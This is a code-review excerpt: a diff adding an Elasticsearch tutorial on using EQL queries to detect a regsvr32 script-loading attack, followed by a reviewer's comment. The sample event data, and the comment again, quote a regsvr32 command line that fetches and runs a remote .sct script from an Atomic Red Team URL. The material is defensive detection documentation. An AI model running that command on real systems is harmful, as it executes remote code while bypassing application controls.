docs/reference/eql/detect-threats-with-eql.asciidoc

```diff
@@ -0,0 +1,424 @@
+            "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
+            "command_line": "regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",
+            "executable": "C:\\Windows\\System32\\regsvr32.exe",
+            "ppid": 2652
+          },
+          "logon_id": 217055,
+          "@timestamp": 131883573237130000,
+          "event": {
+            "category": "process",
+            "type": "creation"
+          },
+          "user": {
+            "full_name": "bob",
+            "domain": "ART-DESKTOP",
+            "id": "ART-DESKTOP\\bob"
+          }
+        }
+      }
+    ]
+  }
+}
+----
+// TESTRESPONSE[s/"took": 21/"took": $body.took/]
+// TESTRESPONSE[s/"_id": "gl5MJXMBMk1dGnErnBW8"/"_id": $body.hits.events.0._id/]
+
+[discrete]
+[[eql-ex-check-for-malicious-script-loads]]
+=== Check for malicious script loads
+
+You now know that `regsvr32.exe` was used to register
+a potentially malicious script as `scrob.dll`. Next, find any processes that
+later load the `scrob.dll` file.
+
+Modify the previous EQL query as follows:
+
+* Change the `any` keyword to `file`. This means the query only matches
+events with an `event.category` of `file`.
+* Add the `file.name == "scrobj.dll` condition to check for loads of
+the `scrobj.dll` file.
+
+[source,console]
+----
+GET /my-index-000001/_eql/search
+{
+  "query": """
+    file where process.name == "regsvr32.exe" and file.name == "scrobj.dll"
+  """,
+  "size": 150
+}
+----
+// TEST[setup:atomic_red_regsvr32]
+
+The query matches an event, confirming that `scrobj.dll` was later loaded by
+`regsvr32.exe`.
+
+[source,console-result]
+----
+{
+  "is_partial": false,
+  "is_running": false,
+  "took": 5,
+  "timed_out": false,
+  "hits": {
+    "total": {
+      "value": 1,
+      "relation": "eq"
+    },
+    "events": [
+      {
+        "_index": "my-index-000001",
+        "_id": "ol5MJXMBMk1dGnErnBW8",
+        "_score": null,
+        "_source": {
+          "process": {
+            "name": "regsvr32.exe",
+            "pid": 2012,
+            "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}",
+            "executable": "C:\\Windows\\System32\\regsvr32.exe"
+          },
+          "file": {
+            "path": "C:\\Windows\\System32\\scrobj.dll",
+            "name": "scrobj.dll"
+          },
+          "@timestamp": 131883573237450016,
+          "event": {
+            "category": "file"
+          }
+        }
+      }
+    ]
+  }
+}
+----
+// TESTRESPONSE[s/"took": 5/"took": $body.took/]
+// TESTRESPONSE[s/"_id": "ol5MJXMBMk1dGnErnBW8"/"_id": $body.hits.events.0._id/]
+
+[discrete]
+[[eql-ex-detemine-likelihood-of-sucess]]
+=== Determine likelihood of success
+
+In many cases, malicious scripts are used to download other remote files. If
+this occurred, the attack progressed and might have succeeded.
+
+Use an <<eql-sequences,EQL sequence query>> to check for the following series of
```

Comment:
Could add a note that based off the command line we saw earlier (`regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll`) that we expect to find a match.

One reason why you might want to write a sequence here, is that it allows you to write the detection more generically and you don't have to overfit to the command line. The sequence looks for all the things that are suspicious, but they're also generic, so you're more likely to detect future variants as well.